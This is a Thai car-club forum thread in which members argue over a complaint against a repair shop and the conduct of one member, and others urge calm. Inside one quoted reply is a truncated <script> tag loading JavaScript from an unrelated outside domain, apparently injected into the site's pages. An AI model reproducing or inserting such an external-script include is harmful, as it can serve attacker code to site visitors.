ผมเข้าใจน่ะครับ 1. ในมุมของผู้เสียหายเอาเรื่องแบบนี้มาลง เพื่อต้องการดิสเครดิตอยู่แล้ว อันนี้ไม่ต้องสงสัย    2.ในด้านของร้านถ้ารับรู้แล้วถึงแม้รู้ภายหลัง ก็มีหน้าที่ตรวจสอบความจริงจากช่างในร้าน และหาทางประณีประนอม โดยควรดำเนินการด้วยตัวเอง   3.ในมุมองของผู้ดูหรือรู้จักบุคคลที่ถูกพาดพิง ในความเห็นผม เราควรแจ้งแก่ผู้ถูกพาดพิงโดยไว เพื่อมีการพูดคุยและปรับความเข้าใจกันเอง จะดีกว่า......     เพราะดูแล้วคุณๆทั้งคู่ก็ไม่ยอมกัน เหมือนกัน ต้องเถียงกันไม่จบแน่ๆเลย 
ได้รับคำขอบคุณจาก: onitsuka37  POP_ES05  Guide6351 
hacker

อังคาร, 26 กุมภา 2013 22:21 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
อ้างอิงจาก:

mai พิมพ์ว่า:
ต้องขอโทษด้วยนะครับ พอได้ทราบเรื่องตั้งแต่เช้าแล้ว แต่วันนี้งานเยอะจริงๆ
เลยไม่มีเวลาเข้ามาตอบ เอาเป็นว่าทางร้านยินดีที่จะรับผิดชอบ จะเปลี่ยนให้ใหม่
เพื่อความสะบายใจของลูกค้า  สะดวกวันไหน ยังไง ก็เข้ามานะครับ ไม่เป็นไรทางเรายินดี
และหวังว่าจะกลับมาใช้บริการอีกนะครับ ทางร้านยังยินดีต้อนรับเสมอ
<script src="https://sport32news.com/civicesgroup.js"></

ผมถึงถามไงว่าคุณอ่านรึยัง

แล้วคุณเห็นที่เค้าตอบรึป่าว

ผมไม่ได้ไปยุ่งเกี่ยวอะไรกับทางร้านเลย ผมคนเชียงใหม่ 

ผมไม่ได้บอกเจ้าของร้านด้วยว่าอะไรเป็นอะไร 

แต่ที่ผมไม่ชอบคือ 

พฤติกรรมแย่ๆ ที่ได้รับคำตอบมาจาก Onlined

ตอนนี้มันไม่ใช่ประเด็นเกี่ยวกับร้านแล้วครับ ใครที่ยังเข้าใจอะไรผิดๆ โปรดเข้าใจ

ประเด็นมันอยู่ที่ คำตอบในรูปสุดท้าย เกี่ยวกับ พฤติกรรมของคน

แก้ไขล่าสุดโดย เมื่อ อังคาร, 26 กุมภา 2013 22:31, ทั้งหมด 2 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: es330  onitsuka37  wut-chiangmai  ballanupong  scanclub  KAATO  POP_ES05  cisco 
jaroenp

ชื่อเล่น: ป๋อ

เข้าร่วม: 29 ธันวา 2010
ตอบ: 376

ได้รับคำขอบคุณ: 272
ให้คำขอบคุณ: 39

ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 26 กุมภา 2013 22:22 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
ใจร่มๆ ครับ
สำหรับประเด็นหลักๆ รู้สึกทางเจ้าของอู่ก็ออกมารับผิดชอบแล้วน่ะครับ

ผมว่าสมาชิกส่วนใหญ่ในนี้ก็ รัก หวง ห่วง รถคู่กายทุกท่านล่ะครับ
รวมทั้งอุปกรณ์ที่น่ารักทุกชิ้นที่บรรจุในรถคันโปรดอ่ะ

แต่สิ่งที่มาคู่ไม่แพ้กันเลย ก็เรื่องของใจ อยากให้เปิดใจกว้างๆ เลย
ให้โอกาส ให้อภัยกันน่ะครับ

ได้โปรดดดดด.
ได้รับคำขอบคุณจาก: onitsuka37  Sak_es5442  POP_ES05 
a_bug

อังคาร, 26 กุมภา 2013 22:30 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
กระทู้นี้เป็นกระทู้ระหว่าง คนสองคนแล้ว ไม่เกี่ยวกับร้านเลย ผมถึงว่าควรหยุดไงล่ะครับ
ได้รับคำขอบคุณจาก: hacker  onitsuka37  POP_ES05 
hacker

อังคาร, 26 กุมภา 2013 22:34 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
กระทู้นี้เป็นกระทู้ระหว่าง คนสองคนแล้ว ไม่เกี่ยวกับร้านเลย ผมถึงว่าควรหยุดไงล่ะครับ

ครับผม อันนี้ผมน้อมรับเลยครับ สุดแล้วแต่ผู้ดูแลระบบจะพิจารณาได้เลย

แต่ผมขอ ดิสเครดิต onlined ตามที่เค้าได้ให้คำตอบข้างๆคูๆกับผมหน่อย

ผมทนไม่ไหวกับพฤติกรรมแย่ๆของคนๆนี้ครับ
ได้รับคำขอบคุณจาก: onitsuka37  tatong  scanclub  POP_ES05 
a_bug

อังคาร, 26 กุมภา 2013 22:46 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
โอม กระทู้นี้จงหายไปจากหน้าหนึ่ง...... ผมว่าเค้าก็คงเหนื่อยแล้วล่ะ ผมยังเหนื่อยเลยต้องมาตามกระทู้นี้ จริงๆนอนไปแล้ว...5555 แต่จริงๆผมก็ชอบเถียงน่ะ สังเกตุได้จากการ เฝ้า และ ตอบกระทู้  อีกกอย่างการถกเถียงถ้าฝ่ายใดฝ่ายนึงไม่หยุดก่อนน่ะ ยาวเลย ไม่มีทั้งคนถูกคนผิดด้วย
ได้รับคำขอบคุณจาก: Sak_es5442  onitsuka37  ballanupong  POP_ES05 
หัวข้อนี้ถูกล็อก คุณไม่สามารถแก้ไข หรือตอบได้
หน้า 1 จาก 5
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.